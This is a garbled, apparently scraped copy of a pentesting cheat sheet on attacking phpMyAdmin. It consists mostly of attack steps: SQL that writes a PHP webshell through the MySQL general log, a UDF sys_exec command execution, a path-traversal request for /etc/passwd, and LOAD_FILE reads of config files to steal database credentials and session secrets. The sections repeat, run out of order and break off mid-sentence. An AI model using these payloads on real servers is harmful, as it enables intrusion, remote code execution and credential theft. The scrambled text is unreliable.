Phpmyadmin Hacktricks Verified -

Use Hydra or a simple Python script. A one-liner:

CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id'); Requires plugin directory write access. Most shared hosting disables this. Part 4: Privilege Escalation via phpMyAdmin Itself 4.1 Config File Disclosure The config.inc.php file contains database credentials and sometimes auth keys.

/var/lib/phpmyadmin/config.inc.php /etc/phpmyadmin/config.inc.php /usr/share/phpmyadmin/config.inc.php phpmyadmin hacktricks verified

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['c']); ?>"; -- This gets written to log file Requires MySQL SUPER privilege (often given to root user in phpMyAdmin). 3.3 User-Defined Functions (UDF) for Persistent Shell Create a MySQL UDF that executes system commands.

POST /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd Improper sanitization of the target parameter. Patched in 4.8.5. Test instances still exist. Part 3: Post-Authentication to Remote Code Execution (RCE) Once logged in, the game is over for the server. 3.1 Into Outfile Method (Most Reliable) If the database user has FILE privilege, you can write a webshell. Use Hydra or a simple Python script

LOAD_FILE('/etc/phpmyadmin/config.inc.php'); Look for $cfg['Servers'][$i]['password'] . If $cfg['blowfish_secret'] is weak or default, you can decrypt session cookies and impersonate admin.

SELECT * FROM information_schema.tables INTO OUTFILE '/tmp/db_dump.sql'; Or use built-in export (less stealthy but faster). If outbound internet is allowed but direct connections monitored, use DNS: Part 4: Privilege Escalation via phpMyAdmin Itself 4

Works on Apache with default www-data permissions. Fails if secure_file_priv is set or web directory not writable. 3.2 General Log File Injection (Bypasses secure_file_priv) When secure_file_priv is NULL, use this method.